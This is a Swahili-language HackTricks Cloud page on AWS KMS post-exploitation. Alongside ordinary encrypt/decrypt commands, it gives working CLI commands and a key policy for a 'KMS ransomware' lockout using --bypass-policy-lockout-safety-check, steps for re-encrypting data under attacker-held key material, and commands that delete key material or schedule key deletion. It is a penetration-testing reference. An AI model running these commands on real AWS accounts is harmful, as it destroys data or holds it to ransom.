Swahili - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - KMS Post Exploitation

Support HackTricks

KMS

Kwa maelezo zaidi angalia:

Encrypt/Decrypt information

Kumbuka kwamba ikiwa unataka kufungua baadhi ya data ndani ya faili, faili lazima iwe na data ya binary, si data iliyokodishwa kwa base64.

  • Kutumia symmetric key

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode

  • Kutumia asymmetric ufunguo:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

Mshambuliaji mwenye ufikiaji wa kipaumbele juu ya KMS anaweza kubadilisha sera ya KMS ya funguo na kutoa ufikiaji wa akaunti yake juu yao, akiondoa ufikiaji uliopewa kwa akaunti halali.

Hivyo, watumiaji wa akaunti halali hawataweza kufikia taarifa yoyote ya huduma yoyote ambayo imekuwa imefichwa kwa kutumia funguo hizo, na kuunda ransomware rahisi lakini yenye ufanisi juu ya akaunti hiyo.

Kumbuka kwamba funguo zinazodhibitiwa na AWS hazihusiki na shambulio hili, ni funguo zinazodhibitiwa na Mteja pekee.

Pia kumbuka hitaji la kutumia param --bypass-policy-lockout-safety-check (ukosefu wa chaguo hili kwenye konso ya wavuti unafanya shambulio hili liwezekane tu kutoka CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Kumbuka kwamba ikiwa utabadilisha sera hiyo na kutoa ufikiaji tu kwa akaunti ya nje, na kisha kutoka kwa akaunti hii ya nje unajaribu kuweka sera mpya ili kurudisha ufikiaji kwa akaunti ya awali, huwezi.

Generic KMS Ransomware

Global KMS Ransomware

Kuna njia nyingine ya kutekeleza KMS Ransomware ya kimataifa, ambayo itahusisha hatua zifuatazo:

  • Unda funguo mpya na vifaa vya funguo vilivyoagizwa na mshambuliaji

  • Re-encrypt data za zamani zilizoshikiliwa na toleo la awali na ile mpya.

  • Futa funguo za KMS

  • Sasa ni mshambuliaji tu, ambaye ana vifaa vya funguo vya awali anaweza kufungua data iliyoshikiliwa.

Destroy keys

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

Kumbuka kwamba AWS sasa inasitisha vitendo vya awali kufanywa kutoka akaunti tofauti:

Support HackTricks
PreviousAWS - IAM Post ExploitationNextAWS - Lambda Post Exploitation

Last updated